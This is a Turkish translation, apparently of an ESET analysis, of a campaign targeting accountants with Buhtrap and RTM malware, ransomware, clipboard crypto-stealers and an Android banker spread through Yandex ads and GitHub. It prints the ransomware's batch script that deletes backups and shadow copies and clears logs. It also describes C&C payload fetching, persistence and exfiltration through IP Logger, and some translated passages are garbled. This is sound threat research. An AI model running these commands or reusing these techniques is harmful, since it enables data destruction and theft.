Muhasebecileri bir siber saldırıda hedeflemek için çevrimiçi olarak aradıkları çalışma belgelerini kullanabilirsiniz. Bu, kabaca bir siber grubun son birkaç aydır yaptığı, bilinen arka kapıları dağıttığı bir şey. и , ayrıca kripto para birimlerini çalmak için şifreleyiciler ve yazılımlar. Hedeflerin çoğu Rusya'da bulunuyor. Saldırı, Yandex.Direct'e kötü amaçlı reklamlar yerleştirilerek gerçekleştirildi. Potansiyel kurbanlar, belge şablonu olarak gizlenen kötü amaçlı bir dosyayı indirmelerinin istendiği bir web sitesine yönlendirildi. Uyarımızın ardından Yandex kötü amaçlı reklamları kaldırdı.
Buhtrap'in kaynak kodu geçmişte herkesin kullanabilmesi için internete sızdırılmıştı. RTM kodunun kullanılabilirliği hakkında hiçbir bilgimiz yok.
Bu yazıda saldırganların kötü amaçlı yazılımları Yandex.Direct'i kullanarak nasıl dağıttığını ve GitHub'da barındırdığını anlatacağız. Yazı, kötü amaçlı yazılımın teknik analiziyle sona erecek.
Buhtrap ve RTM yeniden iş başında
Yayılma mekanizması ve kurbanlar
Kurbanlara iletilen çeşitli yükler ortak bir yayılma mekanizmasını paylaşıyor. Saldırganların oluşturduğu tüm kötü amaçlı dosyalar iki farklı GitHub deposuna yerleştirildi.
Genellikle depoda sık sık değişen, indirilebilir bir kötü amaçlı dosya bulunuyordu. GitHub, bir depodaki değişikliklerin geçmişini görüntülemenize izin verdiğinden, belirli bir dönemde hangi kötü amaçlı yazılımların dağıtıldığını görebiliriz. Kurbanı kötü amaçlı dosyayı indirmeye ikna etmek için yukarıdaki şekilde gösterilen Blanki-shabloni24[.]ru web sitesi kullanıldı.
Sitenin tasarımı ve kötü amaçlı dosyaların tüm adları tek bir kavramı takip etmektedir (formlar, şablonlar, sözleşmeler, örnekler vb.). Buhtrap ve RTM yazılımlarının geçmişte muhasebecilere yönelik saldırılarda zaten kullanıldığı göz önüne alındığında, bu yeni kampanyadaki strateji aynı. Tek soru, kurbanın saldırganların sitesine nasıl ulaştığıdır.
enfeksiyon
Bu siteye gelen en az birkaç potansiyel kurban, kötü niyetli reklamların ilgisini çekti. Aşağıda örnek bir URL verilmiştir:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Bağlantıdan görebileceğiniz gibi, banner meşru muhasebe forumunda bb.f2[.]kz'de yayınlandı. Banner'ların farklı sitelerde göründüğünü, hepsinin aynı kampanya kimliğine (blanki_rsya) sahip olduğunu ve çoğunun muhasebe veya hukuki yardım hizmetleriyle ilgili olduğunu belirtmek önemlidir. URL, potansiyel kurbanın, hedefli saldırılara ilişkin hipotezimizi destekleyen "fatura formunu indirme" isteğini kullandığını gösteriyor. Aşağıda banner'ların göründüğü siteler ve ilgili arama sorguları bulunmaktadır.
- fatura formunu indir – bb.f2[.]kz
- örnek sözleşme - Ipopen[.]ru
- başvuru şikayet örneği - 77metrov[.]ru
- anlaşma formu - boş-dogovor-kupli-prodazhi[.]ru
- örnek mahkeme dilekçesi - zen.yandex[.]ru
- örnek şikayet - yurday[.]ru
- örnek sözleşme formları – Regforum[.]ru
- sözleşme formu – asistantus[.]ru
- örnek apartman sözleşmesi – napravah[.]com
- yasal sözleşme örnekleri - avito[.]ru
Blanki-shabloni24[.]ru sitesi basit bir görsel değerlendirmeyi geçecek şekilde yapılandırılmış olabilir. Tipik olarak, GitHub'a bağlantı içeren profesyonel görünümlü bir siteye işaret eden bir reklam, açıkça kötü bir şey gibi görünmüyor. Ayrıca saldırganlar kötü amaçlı dosyaları depoya yalnızca sınırlı bir süre için, muhtemelen kampanya sırasında yükledi. GitHub deposu çoğu zaman boş bir zip arşivi veya boş bir EXE dosyası içeriyordu. Böylece saldırganlar, Yandex.Direct aracılığıyla, büyük olasılıkla belirli arama sorgularına yanıt olarak gelen muhasebecilerin ziyaret ettiği sitelere reklam dağıtabiliyordu.
Şimdi bu şekilde dağıtılan çeşitli yüklere bakalım.
Yük Analizi
Dağıtımın kronolojisi
Kötü niyetli kampanya Ekim 2018'in sonunda başladı ve bu yazının yazıldığı sırada aktif durumda. Deponun tamamı GitHub'da halka açık olduğundan, altı farklı kötü amaçlı yazılım ailesinin dağıtımına ilişkin doğru bir zaman çizelgesi derledik (aşağıdaki şekle bakın). Git geçmişiyle karşılaştırma yapmak amacıyla, ESET telemetrisi tarafından ölçülen banner bağlantısının ne zaman keşfedildiğini gösteren bir satır ekledik. Gördüğünüz gibi bu, GitHub'daki yükün kullanılabilirliğiyle iyi bir şekilde ilişkilidir. Şubat ayının sonundaki tutarsızlık, değişiklik geçmişinin bir kısmına sahip olmadığımız gerçeğiyle açıklanabilir, çünkü depo biz tam olarak alamadan GitHub'dan kaldırıldı.
Şekil 1. Kötü amaçlı yazılım dağıtımının kronolojisi.
Kod İmzalama Sertifikaları
Kampanyada birden fazla sertifika kullanıldı. Bazılarının birden fazla kötü amaçlı yazılım ailesi tarafından imzalanmış olması, farklı örneklerin aynı kampanyaya ait olduğunu gösteriyor. Özel anahtarın mevcut olmasına rağmen operatörler ikili dosyaları sistematik olarak imzalamadı ve anahtarı tüm örnekler için kullanmadı. Şubat 2019'un sonlarında saldırganlar, özel anahtarına sahip olmadıkları, Google'a ait bir sertifikayı kullanarak geçersiz imzalar oluşturmaya başladı.
Kampanyaya dahil olan tüm sertifikalar ve imzaladıkları kötü amaçlı yazılım aileleri aşağıdaki tabloda listelenmiştir.
Bu kod imzalama sertifikalarını diğer kötü amaçlı yazılım aileleriyle bağlantı kurmak için de kullandık. Çoğu sertifika için GitHub deposu aracılığıyla dağıtılmayan örnekler bulamadık. Ancak botnet'e ait kötü amaçlı yazılımları imzalamak için TOV “MARIYA” sertifikası kullanıldı , reklam yazılımları ve madenciler. Bu kötü amaçlı yazılımın bu kampanyayla ilişkili olması pek olası değildir. Büyük ihtimalle sertifika darknet üzerinden satın alınmıştır.
Win32/Filecoder.Buhtrap
İlk dikkatimizi çeken bileşen yeni keşfedilen Win32/Filecoder.Buhtrap oldu. Bu bazen paketlenmiş bir Delphi ikili dosyasıdır. Esas olarak Şubat-Mart 2019'da dağıtıldı. Bir fidye yazılımı programına yakışır şekilde davranır; yerel sürücüleri ve ağ klasörlerini arar ve tespit edilen dosyaları şifreler. Şifreleme anahtarlarını göndermek için sunucuyla iletişim kurmadığından, güvenliğinin aşılması için bir İnternet bağlantısına ihtiyaç duymaz. Bunun yerine fidye mesajının sonuna bir “belirteç” ekliyor ve operatörlerle iletişime geçmek için e-posta veya Bitmessage kullanılmasını öneriyor.
Mümkün olduğunca çok sayıda hassas kaynağı şifrelemek için Filecoder.Buhtrap, şifrelemeyi engelleyebilecek değerli bilgiler içeren açık dosya işleyicilerine sahip olabilecek önemli yazılımları kapatmak üzere tasarlanmış bir iş parçacığı çalıştırır. Hedef süreçler esas olarak veritabanı yönetim sistemleridir (DBMS). Ayrıca Filecoder.Buhtrap, veri kurtarmayı zorlaştırmak için günlük dosyalarını ve yedeklemeleri siler. Bunu yapmak için aşağıdaki toplu komut dosyasını çalıştırın.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap, web sitesi ziyaretçileri hakkında bilgi toplamak için tasarlanmış meşru bir çevrimiçi IP Logger hizmeti kullanır. Bunun amacı, komut satırının sorumluluğunda olan fidye yazılımının kurbanlarını takip etmektir:
mshta.exe "javascript:document.write('');"
Şifrelenecek dosyalar, üç hariç tutma listesiyle eşleşmezlerse seçilir. Öncelikle aşağıdaki uzantılara sahip dosyalar şifrelenmez: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ve .bat. İkinci olarak, tam yolunun aşağıdaki listedeki dizin dizelerini içerdiği tüm dosyalar hariç tutulur.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Üçüncüsü, fidye mesajının dosya adı da dahil olmak üzere belirli dosya adları da şifrelemenin dışında bırakılır. Liste aşağıda sunulmuştur. Açıkçası, tüm bu istisnaların amacı makinenin çalışır durumda kalmasıdır, ancak yola elverişliliği minimum düzeydedir.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Dosya şifreleme şeması
Kötü amaçlı yazılım yürütüldükten sonra 512 bitlik bir RSA anahtar çifti oluşturur. Özel üs (d) ve modül (n), daha sonra sabit kodlanmış 2048 bitlik bir genel anahtarla (genel üs ve modül), zlib paketli ve base64 kodlu olarak şifrelenir. Bundan sorumlu olan kod Şekil 2'de gösterilmektedir.
Şekil 2. 512 bit RSA anahtar çifti oluşturma işleminin Hex-Rays kaynak koda dönüştürülmesinin sonucu.
Aşağıda, fidye mesajına eklenen bir belirteç olan, oluşturulmuş özel anahtara sahip bir düz metin örneği bulunmaktadır.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Saldırganın public anahtarı aşağıda verilmiştir.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Dosyalar, 128 bitlik bir anahtarla AES-256-CBC kullanılarak şifrelenir. Her şifrelenmiş dosya için yeni bir anahtar ve yeni bir başlatma vektörü oluşturulur. Anahtar bilgileri şifrelenmiş dosyanın sonuna eklenir. Şifrelenmiş dosyanın biçimini ele alalım.
Şifrelenmiş dosyalar aşağıdaki başlığa sahiptir:
VEGA sihirli değerinin eklenmesiyle kaynak dosya verileri ilk 0x5000 bayta kadar şifrelenir. Tüm şifre çözme bilgileri aşağıdaki yapıya sahip bir dosyaya eklenir:
- Dosya boyutu işaretçisi, dosyanın boyutunun 0x5000 bayttan büyük olup olmadığını gösteren bir işaret içerir
— AES anahtar blobu = ZlibCompress(RSAEncrypt(AES anahtarı + IV, oluşturulan RSA anahtar çiftinin ortak anahtarı))
- RSA anahtar bloğu = ZlibCompress(RSAEncrypt(oluşturulan RSA özel anahtarı, sabit kodlu RSA genel anahtarı))
Win32/ClipBanker
Win32/ClipBanker, Ekim ayının sonundan Aralık 2018'in başına kadar aralıklı olarak dağıtılan bir bileşendir. Rolü panonun içeriğini izlemek, kripto para birimi cüzdanlarının adreslerini aramaktır. ClipBanker, hedef cüzdan adresini belirledikten sonra bu adresi operatörlere ait olduğuna inanılan bir adresle değiştiriyor. İncelediğimiz örnekler ne kutulanmış ne de gizlenmişti. Davranışı maskelemek için kullanılan tek mekanizma dize şifrelemedir. Operatör cüzdan adresleri RC4 kullanılarak şifrelenir. Hedef kripto para birimleri Bitcoin, Bitcoin Cash, Dogecoin, Ethereum ve Ripple'dır.
Kötü amaçlı yazılımın saldırganların Bitcoin cüzdanlarına yayıldığı dönemde VTS'ye küçük bir miktar gönderilmiş olması, kampanyanın başarısı konusunda şüphe uyandırıyor. Ayrıca bu işlemlerin ClipBanker ile ilgili olduğunu gösteren hiçbir kanıt bulunmuyor.
Win32/RTM
Win32/RTM bileşeni, Mart 2019'un başlarında birkaç gün boyunca dağıtıldı. RTM, Delphi'de yazılmış, uzak bankacılık sistemlerini hedefleyen bir Truva atı bankacısıdır. 2017'de ESET araştırmacıları şunları yayınladı: Bu programın açıklaması hala geçerlidir. Ocak 2019'da Palo Alto Networks ayrıca şunları yayınladı: .
Buhtrap Yükleyici
Bir süredir GitHub'da önceki Buhtrap araçlarına benzemeyen bir indirici mevcuttu. O dönüyor https://94.100.18[.]67/RSS.php?<some_id> bir sonraki aşamaya geçmek ve onu doğrudan belleğe yüklemek için. İkinci aşama kodun iki davranışını ayırt edebiliriz. İlk URL'de RSS.php, Buhtrap arka kapısını doğrudan geçti; bu arka kapı, kaynak kodu sızdırıldıktan sonra kullanılabilen arka kapıya çok benziyor.
İlginç bir şekilde, Buhtrap arka kapısına sahip birkaç kampanya görüyoruz ve bunların farklı operatörler tarafından yürütüldüğü iddia ediliyor. Bu durumda temel fark, arka kapının doğrudan belleğe yüklenmesi ve bahsettiğimiz DLL dağıtım sürecindeki olağan şemayı kullanmamasıdır. . Ayrıca operatörler, C&C sunucusuna giden ağ trafiğini şifrelemek için kullanılan RC4 anahtarını da değiştirdi. Gördüğümüz kampanyaların çoğunda operatörler bu anahtarı değiştirme zahmetine girmediler.
İkinci ve daha karmaşık davranış ise RSS.php URL'sinin başka bir yükleyiciye aktarılmasıydı. Dinamik içe aktarma tablosunun yeniden oluşturulması gibi bazı karışıklıklar uyguladı. Önyükleyicinin amacı C&C sunucusuyla iletişim kurmaktır. [.]com/api/F27F84EDA4D13B15/2, günlükleri gönderin ve yanıt bekleyin. Yanıtı bir blob olarak işler, belleğe yükler ve çalıştırır. Bu yükleyiciyi çalıştırırken gördüğümüz yük aynı Buhtrap arka kapısıydı, ancak başka bileşenler de olabilir.
Android/Spy.Banker
İlginç bir şekilde GitHub deposunda Android için bir bileşen de bulundu. Sadece bir gün ana şubedeydi - 1 Kasım 2018. ESET telemetrisi, GitHub'da yayınlanması dışında bu kötü amaçlı yazılımın dağıtıldığına dair hiçbir kanıt bulamadı.
Bileşen bir Android Uygulama Paketi (APK) olarak barındırıldı. Oldukça bulanık. Kötü amaçlı davranış, APK'da bulunan şifrelenmiş bir JAR'da gizlenmiştir. Bu anahtar kullanılarak RC4 ile şifrelenir:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Dizeleri şifrelemek için aynı anahtar ve algoritma kullanılır. JAR'ın bulunduğu yer APK_ROOT + image/files. Dosyanın ilk 4 baytı, uzunluk alanından hemen sonra başlayan şifrelenmiş JAR'ın uzunluğunu içerir.
Dosyanın şifresini çözdükten sonra onun Anubis olduğunu keşfettik - daha önce Android için bankacı. Kötü amaçlı yazılım aşağıdaki özelliklere sahiptir:
- mikrofon kaydı
- ekran görüntüsü alma
- GPS koordinatlarını alma
- tuş kaydedici
- cihaz verileri şifreleme ve fidye talebi
- spam yapmak
İlginç bir şekilde bankacı, başka bir C&C sunucusu elde etmek için Twitter'ı yedek iletişim kanalı olarak kullandı. Analiz ettiğimiz örnek @JonesTrader hesabını kullanıyordu ancak analiz sırasında bu hesap zaten engellenmişti.
Bankacı, Android cihazındaki hedef uygulamaların bir listesini içerir. Sophos çalışmasında elde edilen listeden daha uzundur. Listede birçok bankacılık uygulaması, Amazon ve eBay gibi çevrimiçi alışveriş programları ve kripto para birimi hizmetleri yer alıyor.
MSIL/ClipBanker.IH
Bu kampanya kapsamında dağıtılan son bileşen, Mart 2019'da ortaya çıkan .NET Windows yürütülebilir dosyasıydı. İncelenen sürümlerin çoğu ConfuserEx v1.0.0 ile paketlenmiştir. ClipBanker gibi bu bileşen de panoyu kullanır. Amacı, çok çeşitli kripto para birimlerinin yanı sıra Steam'deki tekliflerdir. Ayrıca Bitcoin özel WIF anahtarını çalmak için IP Logger hizmetini kullanıyor.
Koruma Mekanizmaları
ConfuserEx'in hata ayıklamayı, dökümü ve kurcalamayı önleme konusunda sağladığı faydalara ek olarak bileşen, antivirüs ürünlerini ve sanal makineleri algılama yeteneğini de içerir.
Kötü amaçlı yazılım, sanal bir makinede çalıştığını doğrulamak için yerleşik Windows WMI komut satırını (WMIC) kullanarak BIOS bilgilerini ister:
wmic bios
Daha sonra program komut çıktısını ayrıştırır ve anahtar kelimeleri arar: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kötü amaçlı yazılım, antivirüs ürünlerini algılamak için Windows Güvenlik Merkezi'ne bir Windows Yönetim Araçları (WMI) isteği gönderir. ManagementObjectSearcher Aşağıda gösterildiği gibi API. Base64'ten kod çözüldükten sonra çağrı şöyle görünür:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Şekil 3. Antivirüs ürünlerini tanımlama süreci.
Ayrıca kötü amaçlı yazılım, , pano saldırılarına karşı koruma sağlayan bir araçtır ve çalıştırılıyorsa bu işlemdeki tüm iş parçacıklarını askıya alır, böylece korumayı devre dışı bırakır.
Kalıcılık
İncelediğimiz kötü amaçlı yazılım sürümü kendisini kopyalıyor %APPDATA%googleupdater.exe ve google dizini için “gizli” niteliğini ayarlar. Sonra değeri değiştirir SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows kayıt defterinde ve yolu ekler updater.exe. Bu şekilde, kötü amaçlı yazılım, kullanıcı her oturum açtığında çalıştırılacaktır.
Kötü niyetli davranış
ClipBanker gibi, kötü amaçlı yazılım da panonun içeriğini izliyor ve kripto para birimi cüzdan adreslerini arıyor ve bulduğunda onu operatörün adreslerinden biriyle değiştiriyor. Aşağıda, kodda bulunanlara dayalı olarak hedef adreslerin bir listesi bulunmaktadır.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Her adres türüne karşılık gelen bir düzenli ifade vardır. STEAM_URL değeri, arabellekte tanımlamak için kullanılan normal ifadeden de görülebileceği gibi Steam sistemine saldırmak için kullanılır:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Süzme kanalı
Kötü amaçlı yazılım, arabellekteki adresleri değiştirmenin yanı sıra Bitcoin, Bitcoin Core ve Electrum Bitcoin cüzdanlarının özel WIF anahtarlarını da hedef alıyor. Program, WIF özel anahtarını elde etmek için plogger.org'u bir sızma kanalı olarak kullanıyor. Bunu yapmak için operatörler, aşağıda gösterildiği gibi özel anahtar verilerini Kullanıcı Aracısı HTTP başlığına ekler.
Şekil 4. Çıkış verilerini içeren IP Logger konsolu.
Operatörler cüzdanlara sızmak için iplogger.org'u kullanmadı. Muhtemelen alandaki 255 karakter sınırından dolayı farklı bir yönteme başvurmuşlardır. User-AgentIP Logger web arayüzünde görüntülenir. İncelediğimiz örneklerde diğer çıktı sunucusu ortam değişkeninde saklanıyordu. DiscordWebHook. Şaşırtıcı bir şekilde, bu ortam değişkeni kodun herhangi bir yerine atanmamıştır. Bu, kötü amaçlı yazılımın hâlâ geliştirilme aşamasında olduğunu ve değişkenin operatörün test makinesine atandığını gösteriyor.
Programın geliştirilmekte olduğuna dair başka bir işaret daha var. İkili dosya iki iplogger.org URL'si içerir ve veriler dışarı sızdırıldığında her ikisi de sorgulanır. Bu URL’lerden birine yapılan istekte Yönlendiren alanındaki değerin önüne “DEV /” eklenir. Ayrıca ConfuserEx kullanılarak paketlenmemiş bir sürüm de bulduk; bu URL'nin alıcısının adı DevFeedbackUrl'dir. Ortam değişkeni adına dayanarak, operatörlerin meşru hizmet olan Discord'u ve onun web müdahale sistemini kripto para birimi cüzdanlarını çalmak için kullanmayı planladıklarına inanıyoruz.
Sonuç
Bu kampanya, meşru reklam hizmetlerinin siber saldırılarda kullanılmasına bir örnektir. Plan Rus kuruluşlarını hedef alıyor ancak Rus olmayan hizmetleri kullanan böyle bir saldırıyı görmek bizi şaşırtmaz. Ödün vermekten kaçınmak için kullanıcıların indirdikleri yazılımın kaynağının itibarına güvenmeleri gerekir.
Tehlike göstergelerinin ve MITRE ATT&CK özelliklerinin tam listesi şu adreste mevcuttur: .
Kaynak: habr.com